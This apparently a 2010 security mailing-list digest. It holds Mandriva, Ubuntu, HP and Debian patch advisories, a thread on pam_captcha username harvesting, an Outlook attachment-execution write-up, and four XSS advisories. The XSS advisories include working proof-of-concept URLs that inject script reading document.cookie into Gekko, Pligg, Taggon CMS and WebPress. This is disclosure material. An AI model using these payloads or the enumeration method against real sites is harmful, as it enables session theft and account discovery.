-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:132 http://www.mandriva.com/security/ ___ Package : python Date: July 14, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in python: Multiple integer overflows in audioop.c in the audioop module in Ptthon allow context-dependent attackers to cause a denial of service (application crash) via a large fragment, as demonstrated by a call to audioop.lin2lin with a long string in the first argument, leading to a buffer overflow. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-3143.5 (CVE-2010-1634). The audioop module in Python does not verify the relationships between size arguments and byte string lengths, which allows context-dependent attackers to cause a denial of service (memory corruption and application crash) via crafted arguments, as demonstrated by a call to audioop.reverse with a one-byte string, a different vulnerability than CVE-2010-1634 (CVE-2010-2089). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089 ___ Updated Packages: Mandriva Linux 2008.0: 4f913679ea6f154f0d7c84c8bafd3fe3 2008.0/i586/libpython2.5-2.5.2-2.7mdv2008.0.i586.rpm dfab01f9210fa284ad3b4dd271bfb3dd 2008.0/i586/libpython2.5-devel-2.5.2-2.7mdv2008.0.i586.rpm b6245a9dc5423d14ba96f4f388dd0fe6 2008.0/i586/python-2.5.2-2.7mdv2008.0.i586.rpm 15c39b51c66cc78aec157eaed0267a7b 2008.0/i586/python-base-2.5.2-2.7mdv2008.0.i586.rpm e38a9894712bf82a8dcc1eee1265592c 2008.0/i586/python-docs-2.5.2-2.7mdv2008.0.i586.rpm 2f2100e6dd35a4aef8e503394a723e81 2008.0/i586/tkinter-2.5.2-2.7mdv2008.0.i586.rpm 29b96d4b84a7241fc78f55671f1a33f0 2008.0/i586/tkinter-apps-2.5.2-2.7mdv2008.0.i586.rpm 211a673f3cd2e1b7d153d6f40291ad86 2008.0/SRPMS/python-2.5.2-2.7mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5f9e4e0e27dfa80a7fa2bf62998edf25 2008.0/x86_64/lib64python2.5-2.5.2-2.7mdv2008.0.x86_64.rpm 36bfe236a350a8e9a0e2657eefadd299 2008.0/x86_64/lib64python2.5-devel-2.5.2-2.7mdv2008.0.x86_64.rpm c03cc44dac5ecdf49d7bf2ca5ad5477a 2008.0/x86_64/python-2.5.2-2.7mdv2008.0.x86_64.rpm 1965d6962b5cfe7349f4369bceda2ce4 2008.0/x86_64/python-base-2.5.2-2.7mdv2008.0.x86_64.rpm e13c770d7ddcc045251733d69865a3ae 2008.0/x86_64/python-docs-2.5.2-2.7mdv2008.0.x86_64.rpm cff8d5ef80f29b2f9e32e171420ede11 2008.0/x86_64/tkinter-2.5.2-2.7mdv2008.0.x86_64.rpm e8d3db4327d427c9451bf604e5cd1bb7 2008.0/x86_64/tkinter-apps-2.5.2-2.7mdv2008.0.x86_64.rpm 211a673f3cd2e1b7d153d6f40291ad86 2008.0/SRPMS/python-2.5.2-2.7mdv2008.0.src.rpm Mandriva Linux 2009.0: 598630ce234cff98465351b4af90d664 2009.0/i586/libpython2.5-2.5.2-5.6mdv2009.0.i586.rpm 44a691ffb51a47dd653fbf03d5a9be00 2009.0/i586/libpython2.5-devel-2.5.2-5.6mdv2009.0.i586.rpm ea55908df10ad9e82a5d361612bcbca7 2009.0/i586/python-2.5.2-5.6mdv2009.0.i586.rpm cb25c56f6f68e0bb036cd1be0360595d 2009.0/i586/python-base-2.5.2-5.6mdv2009.0.i586.rpm 0161f8c43b4fbf019ef24a72760d3113 2009.0/i586/python-docs-2.5.2-5.6mdv2009.0.i586.rpm 987651d11ca710910a89e52330873187 2009.0/i586/tkinter-2.5.2-5.6mdv2009.0.i586.rpm a73ba0fa7adcb1ebe2806335e575e8b2 2009.0/i586/tkinter-apps-2.5.2-5.6mdv2009.0.i586.rpm a6602a71f4573ecb82951a861165fee8 2009.0/SRPMS/python-2.5.2-5.6mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: f22f06db4cc4e8f431aadeaa552f0891 2009.0/x86_64/lib64python2.5-2.5.2-5.6mdv2009.0.x86_64.rpm a15984e4b2e6821789ba36760aa08a79 2009.0/x86_64/lib64python2.5-devel-2.5.2-5.6mdv2009.0.x86_64.rpm 329f34c1eb9cbf68805edcbb0efda8a2 2009.0/x86_64/python-2.5.2-5.6mdv2009.0.x86_64.rpm 5404e1caa073784bbcb6aab8dff592bf 2009.0/x86_64/python-base-2.5.2-5.6mdv2009.0.x86_64.rpm 59e2bbd0517468929db90ad4e9448dc7 2009.0/x86_64/python-docs-2.5.2-5.6mdv2009.0.x86_64.rpm b9821ba18b02ad9ae3b5831ac4893fee 2009.0/x86_64/tkinter-2.5.2-5.6mdv2009.0.x86_64.rpm 3593d6bdf3fbc698301edee3d0906e58 2009.0/x86_64/tkinter-apps-2.5.2-5.6mdv2009.0.x86_64.rpm a6602a71f4573ecb82951a861165fee8 2009.0/SRPMS/python-2.5.2-5.6mdv2009.0.src.rpm Mandriva Linux 2009.1: 3404f9ddf0f432a2ba81e78ce0408fd8
Re: pam_captcha username harvest vulnerability
On 7/14/2010 10:04 PM, Jordan Sissel wrote: On Tue, Jul 6, 2010 at 11:04 AM, Ian Maguireimagu...@superb.net wrote: pam_captcha is visual text-based CAPTCHA challenge module for PAM that uses figlet to generate the CAPTCHAs. Project site: http://www.semicomplete.com/projects/pam_captcha/ A site with a screen shot: http://www.michaelboman.org/how-to/securing-ssh-access-with-pam-captcha I found a security problem with the pam_captcha. If you enter a username that is not a valid user followed by the correct CAPTCHA, you do not get prompted for a password. You simply get prompted for another CAPTCHA. However, if you enter a username that is a valid user followed by the correct CAPTCHA, you will get prompted for a password. This means an attacker, or a script/bot could easily harvest a list of valid usernames simply by whether or not it prompts for a password after a valid captcha entry. I have duplicated this behavior in FreeBSD 8.0 which uses BSD's OpenPAM. From what I have seen this module is not compatible with Linux-PAM. I don't know enough C Fu to propose a patch. Until it is patched the solution is to disable pam_captcha in your pam config file. The creator of this module seems to think that using this module isn't really even necessary. http://www.semicomplete.com/blog/geekery/pam_captcha_research.html - ian I can't reproduce the behavior you describe on FreeBSD 8.0 nor on Ubuntu 9.10. It seems more likely that what you experience is actually misconfigured sshd/pam. With pam_captcha 1.3 on a fresh FreeBSD 8.0-RELEASE and this /etc/pam.d/sshd config: auth sufficient pam_opie.so no_warn no_fake_prompts auth requisite pam_opieaccess.so no_warn allow_local auth requisite pam_captcha.so randomstring #auth sufficient pam_krb5.so no_warn try_first_pass #auth sufficient pam_ssh.so no_warn try_first_pass auth required pam_unix.so no_warn try_first_pass My sshd_config has this: ChallengeResponseAuthentication yes PasswordAuthentication no UsePAM yes What I see: Successful pass of the captcha with an invalid username results in being given another captcha or an abort (if this is multiple failures) and PAM logs the fact that there was a failure due to invalid user. This behavior you are describing is exactly the problem. When you enter a valid username, followed by a successful captcha entry, it prompts you for a password. However, if you enter an invalid username, followed by a successful captcha entry, it prompts you for another captcha instead of a password. Since the behavior is different when it is an invalid username, it is trivial to harvest a list of valid usernames. For example, if you are using pam_captcha, an attacker can immediately know if you allow root ssh logins simply by attempting to ssh in as root, and noticing whether, or not there is a prompt for a password after a valid captcha entry. They can do this with any username. Make a script to automate it, and they can harvest a list of valid usernames. For example, if you don't disable PasswordAuthentication then pam failures could (captcha or other failures) will give up after a few tries and move on to Password auth (no captcha) auth instead. Are you sure this isn't something misconfigured on your side? Can you publish your sshd_config and pam configs? This was on a fresh install of FreeBSD 8.0 with no modifications to the sshd config, so I won't bother sharing that one. The only the change I made to the pam config was adding the pam captcha line at the beginning. I'll paste the /etc/pam.d/sshd config below: # # $FreeBSD: src/etc/pam.d/sshd,v 1.16.10.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # # PAM configuration for the sshd service # # auth auth requisite pam_captcha.so randomstring auth sufficient pam_opie.so no_warn no_fake_prompts auth requisite pam_opieaccess.so no_warn allow_local #auth sufficient pam_krb5.so no_warn try_first_pass #auth sufficient pam_ssh.so no_warn try_first_pass auth required pam_unix.so no_warn try_first_pass # account account required pam_nologin.so #account required pam_krb5.so account required pam_login_access.so account required pam_unix.so # session #session optional pam_ssh.so session required pam_permit.so # password #password sufficient pam_krb5.so no_warn try_first_pass password required pam_unix.so no_warn try_first_pass -Jordan
[USN-962-1] VTE vulnerability
=== Ubuntu Security Notice USN-962-1 July 15, 2010 vte vulnerability CVE-2010-2713 === A security issue affects the following Ubuntu releases: Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: libvte9 1:0.20.0-0ubuntu2.1 Ubuntu 9.10: libvte9 1:0.22.2-0ubuntu2.1 Ubuntu 10.04 LTS: libvte9 1:0.23.5-0ubuntu1.1 After a standard system update you need to restart your session to make all the necessary changes. Details follow: Janne Snabb discovered that applications using VTE, such as gnome-terminal, did not correctly filter window and icon title request escape codes. If a user were tricked into viewing specially crafted output in their terminal, a remote attacker could execute arbitrary commands with user privileges. Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/v/vte/vte_0.20.0-0ubuntu2.1.diff.gz Size/MD5: 428402 e765295968fe78b4d8e72050dce5f2b7 http://security.ubuntu.com/ubuntu/pool/main/v/vte/vte_0.20.0-0ubuntu2.1.dsc Size/MD5: 1742 91b6ea4ecd1400d57d72190fab77960c http://security.ubuntu.com/ubuntu/pool/main/v/vte/vte_0.20.0.orig.tar.gz Size/MD5: 1372195 2634f593b93950c58cc12983bdc363cc Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-common_0.20.0-0ubuntu2.1_all.deb Size/MD5:34100 cb3960a156fb27606aeafcc8a3222b46 http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-doc_0.20.0-0ubuntu2.1_all.deb Size/MD5:64118 50ab6b9ed24762be4629e480b28e18c1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_amd64.deb Size/MD5: 381230 d11c934f31bd1382bb6d62603e839199 http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_amd64.udeb Size/MD5: 333636 77562502f522d91fbbea6b5eba1d0982 http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_amd64.deb Size/MD5: 599364 edc9be7f0fa11e6281a553208dfb3842 http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_amd64.deb Size/MD5: 177654 58665e2a253ecf2653d9023733573ce2 http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte_0.20.0-0ubuntu2.1_amd64.deb Size/MD5:36754 2f3d7f2540a8e6089eb143887ece13d2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_i386.deb Size/MD5: 357832 e255a12e7f921dd4da70a9c81ccd8a72 http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_i386.udeb Size/MD5: 320620 b0f150837119c4e557c9c535a969e949 http://security.ubuntu.com/ubuntu/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_i386.deb Size/MD5: 578074 cefed97e22169f7c47d2576ff925b3ff http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_i386.deb Size/MD5: 160650 3c6f0e195b16937bd6c159bc32ffd34c http://security.ubuntu.com/ubuntu/pool/main/v/vte/python-vte_0.20.0-0ubuntu2.1_i386.deb Size/MD5:29878 082fd94ee2d4079d8e120e7adc525d01 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_lpia.deb Size/MD5: 357150 275ea65ad8d4f0afa645070809bc83db http://ports.ubuntu.com/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_lpia.udeb Size/MD5: 318818 d4239f5aca45b71b5b51469111abaaa1 http://ports.ubuntu.com/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_lpia.deb Size/MD5: 575628 90f4af7d86e34f4eb49ac2c69751b544 http://ports.ubuntu.com/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_lpia.deb Size/MD5: 161258 9906e6464b75188f61bcf2626209f4e5 http://ports.ubuntu.com/pool/main/v/vte/python-vte_0.20.0-0ubuntu2.1_lpia.deb Size/MD5:29788 5d8228882a46943378e300854c2e8bf9 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/v/vte/libvte-dev_0.20.0-0ubuntu2.1_powerpc.deb Size/MD5: 434366 44f0c8d2cc517dec5cda7b23ae364989 http://ports.ubuntu.com/pool/main/v/vte/libvte9-udeb_0.20.0-0ubuntu2.1_powerpc.udeb Size/MD5: 380478 af6da9a37b4b4dfe9277985388726c97 http://ports.ubuntu.com/pool/main/v/vte/libvte9_0.20.0-0ubuntu2.1_powerpc.deb Size/MD5: 702506 9cd310cc8a3a9b10eb3ee3753500fcbe http://ports.ubuntu.com/pool/main/v/vte/python-vte-dbg_0.20.0-0ubuntu2.1_powerpc.deb Size/MD5: 171112 1392f41f7fd399d4f5a2b6901b9afdc8
[security bulletin] HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02286083 Version: 1 HPSBMA02554 SSRT100018 rev.2 - HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-07-12 Last Updated: 2010-07-13 Potential Security Impact: Remote execution of arbitrary code, remote Denial of Service (DoS), remote unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Insight Control for Linux (IC-LX). The vulnerabilities could be remotely exploited to allow execution of arbitrary code, remote Denial of Service (DoS), and remote unauthorized access. References: CVE-2009-0692, CVE-2007-5497, CVE-2007-2452, CVE-2010-0001, CVE-2010-1129, CVE-2008-5110 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control for Linux 6.0 and previous versions BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2009-0692(AV:A/AC:L/Au:N/C:C/I:C/A:C)8.3 CVE-2007-5497(AV:N/AC:M/Au:N/C:P/I:P/A:N)4.9 CVE-2007-2452(AV:N/AC:M/Au:S/C:P/I:P/A:P)6.4 CVE-2010-0001(AV:N/AC:M/Au:N/C:P/I:P/A:P)6.8 CVE-2010-1129(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5 CVE-2008-5110(AV:N/AC:M/Au:N/C:C/I:C/A:C) 10.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 Note: HP Insight Control for Linux v6.1 incorporates updated packages that include security updates for Dhclient, E2fsprogs, Findutils, Gzip, PHP and Syslog-ng. RESOLUTION HP has provided HP Insight Control for Linux v6.1 to resolve this vulnerability. The updated kit can be downloaded as follows. Browse to http://www.hp.com/go/ic-lx and click on Software Downloads. PRODUCT SPECIFIC INFORMATION None HISTORY Version:1 (rev.1) - 12 July 2010 Initial Release Version:2 (rev.2) - 13 July 2010 Changed abbreviated name to IC-LX Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's
XSS vulnerability in Gekko Web Builder
Vulnerability ID: HTB22474 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_gekko_web_builder.html Product: Gekko Web Builder Vendor: Baby Gekko IT Consulting ( http://www.babygekko.com/ ) Vulnerable Version: v0.90 ALPHA and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the /admin/index.php script to properly sanitize user-supplied input in app variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/admin/index.php?app=settings;scriptalert(document.cookie)/script
Outlook PR_ATTACH_METHOD file execution vulnerability
Outlook PR_ATTACH_METHOD file execution vulnerability Yorick Koster, October 2009 Abstract It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also file stored remotely for example on a file share. Exploitation is limited by the fact that its is not possible for attackers to supply command line options. See also - CVE-2010-0266 [2] - MS10-045 [3] Vulnerability in Microsoft Office Outlook Could Allow Remote Code Execution (978212) - Security Research Defense blog: [4] MS10-045: Microsoft Office Outlook Remote Code Execution vulnerability - KB978212 [5] MS10-045: Vulnerability in Microsoft Office Outlook could allow remote code execution - KB2271150 [6] You cannot open linked file attachments in Outlook: Outlook blocked access to the following potentially unsafe attachments - SSD: [7] SecuriTeam Secure Disclosure program Tested version This issue was tested on the latest versions of Outlook 2003 SP3 and Outlook 2007 SP2. Fix Microsoft released MS10-045 [8] that blocks unsafe use of the PR_ATTACH_METHOD property in e-mail messages. Introduction Microsoft Office Outlook is a personal information manager. It is often mainly used as an e-mail application, but it also includes a calendar, task manager, contact manager, note taking, a journal and web browsing. Outlook supports various e-mail formats, including plain text, HTML and TNEF. TNEF is a proprietary format used by Microsoft Outlook and Microsoft Exchange Server. TNEF messages or TNEF streams exist of message and/or attachment attributes. These attributes contain basic properties, such as message subject, date sent and attachment title (file name). Additional attributes can be set using MAPI properties, which are stored in attMAPIProps or attAttachment TNEF structures. MAPI attachment properties In MAPI, there are a couple of properties available that are specific for handling e-mail attachments. One of these properties is the PR_ATTACH_METHOD property. This property can be set to a MAPI-defined constant and represents the way the contents of an attachment can be accessed. For most attachments, this property will be set to ATTACH_BY_VALUE. When set to this value, the attachment data is either stored in the PR_ATTACH_DATA_BIN MAPI property or it is stored in a attAttachData TNEF structure. If the PR_ATTACH_METHOD property is set to ATTACH_BY_REFERENCE, ATTACH_BY_REF_ONLY or ATTACH_BY_REF_RESOLVE, Outlook expects a fully-qualified path name instead of an embedded attachment. This path name is set using either the PR_ATTACH_PATHNAME or PR_ATTACH_LONG_PATHNAME MAPI property. The path name can be set to a Universal naming convention (UNC) name. ATTACH_BY_REF_RESOLVE A message or attachment can have a Message Class property that loosely defines the type of a message, contact or other personal information manager objects. For normal e-mail messages, the message class is set to IPM.Note. The Message Class is set by the TNEF attMessageClass structure or by the PR_MESSAGE_CLASS MAPI property. If the Message Class is set to IPM.Document Outlook will process this message as an e-mail message consisting of a single attachment. By appending a subclass to IPM.Document it is possible to more specifically state what type of document the attachment is. For example, a Message Class of IPM.Document.txtfile indicates that the attachment is a plain text file, while IPM.Document.Excel.Sheet.12 indicates a Microsoft Excel
XSS vulnerability in Pligg search module
Vulnerability ID: HTB22467 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pligg_search_module.html Product: Pligg Vendor: Pligg, LLC ( http://www.pligg.com/demo/ ) Vulnerable Version: 1.0.4 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the search.php script to properly sanitize user-supplied input in search variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/search/1;scriptalert(document.cookie)/script
[SECURITY] [DSA 2070-1] New freetype packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2070-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff July 14, 2010 http://www.debian.org/security/faq - Package: freetype Vulnerability : several Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2010-2497 CVE-2010-2498 CVE-2010-2499 CVE-2010-2500 CVE-2010-2519 CVE-2010-2520 CVE-2010-2527 Robert Swiecki discovered several vulnerabilities in the FreeType font library, which could lead to the execution of arbitrary code if a malformed font file is processed. Also, several buffer overflows were found in the included demo programs. For the stable distribution (lenny), these problems have been fixed in version 2.3.7-2+lenny2. For the unstable distribution (sid), these problems have been fixed in version 2.4.0-1. We recommend that you upgrade your freetype packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny2.dsc Size/MD5 checksum: 1219 a5930e5dfa3757bed045a67b7ef0e3e2 http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7.orig.tar.gz Size/MD5 checksum: 1567540 c1a9f44fde316470176fd6d66af3a0e8 http://security.debian.org/pool/updates/main/f/freetype/freetype_2.3.7-2+lenny2.diff.gz Size/MD5 checksum:36156 f1cb13247588b40f8f6c9d232df7efde alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_alpha.deb Size/MD5 checksum: 775180 d9d1a2680550113aab5a5aa23998458e http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_alpha.deb Size/MD5 checksum: 411954 63d800f83bd77f18b9307cd77b5cfd1d http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_alpha.deb Size/MD5 checksum: 253784 b95be0af80d58e4e0818dd9b66447d9e http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_alpha.udeb Size/MD5 checksum: 296564 6e080492ee03692588c5953b36bade6d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_amd64.udeb Size/MD5 checksum: 269680 4c9e6efc6c36f0867c74dde033b97ac8 http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_amd64.deb Size/MD5 checksum: 223010 5b9c55fc8ef35251ccdc3c1d22b13edd http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_amd64.deb Size/MD5 checksum: 713084 b5933f78399f7d690f786fb7f04d1eca http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_amd64.deb Size/MD5 checksum: 385600 741877f101eef1dd6f77aead47ddbba1 arm architecture (ARM) http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_arm.deb Size/MD5 checksum: 205134 624b8b38b6cea2d569c70a18a5f78934 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_arm.udeb Size/MD5 checksum: 242180 d7c5020f9cb5417378b80571bc2eccd4 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_arm.deb Size/MD5 checksum: 686080 a12f9cb0b5f76071ed204cfdcc571cd5 http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_arm.deb Size/MD5 checksum: 356996 ff79207089cce445fa6d0514156f12cf armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.3.7-2+lenny2_armel.deb Size/MD5 checksum: 684278 7654ae1ba45138f11c53da2acce6055c http://security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.3.7-2+lenny2_armel.deb Size/MD5 checksum: 210040 2d05fa53273572a89c81c9085a291fee http://security.debian.org/pool/updates/main/f/freetype/libfreetype6-udeb_2.3.7-2+lenny2_armel.udeb Size/MD5 checksum: 236524 727d731977efad369b51fdc28d42bade http://security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.3.7-2+lenny2_armel.deb Size/MD5 checksum: 353412
XSS vulnerability in Taggon CMS
Vulnerability ID: HTB22477 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_taggon_cms.html Product: Taggon CMS Vendor: Onison ( http://www.onison.com/articles/3 ) Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the slideShow.html script to properly sanitize user-supplied input in many variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1slideShowMode=1external=1category=_u1234567_inbox%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1slideShowMode=1external=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ecategory=_u1234567_inbox http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1slideShowMode=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Eexternal=1category=_u1234567_inbox http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1pic=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3EslideShowMode=1external=1category=_u1234567_inbox http://host/slideShow.html?company=COMPANYuserid=USERCurrentSlide=1%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Epic=1slideShowMode=1external=1category=_u1234567_inbox http://host/slideShow.html?company=COMPANY%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Euserid=USERCurrentSlide=1pic=1slideShowMode=1external=1category=_u1234567_inbox
XSS vulnerability in WebPress
Vulnerability ID: HTB22481 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_webpress_3.html Product: WebPress Vendor: YWP ( http://www.goywp.com/ ) Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions Vendor Notification: 01 July 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the admin_page_accounts_users_action.php script to properly sanitize user-supplied input in id_num_mod variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/path/_system/accounts/users/_pages/admin_page_accounts_users_action.php?id_num_mod=xxx%3Cscript%3Ealert%28document.cookie%29%3C/script%3Esubmit_action=Edit
Secunia Research: GIGABYTE Dldrv2 ActiveX Control Unsafe Methods
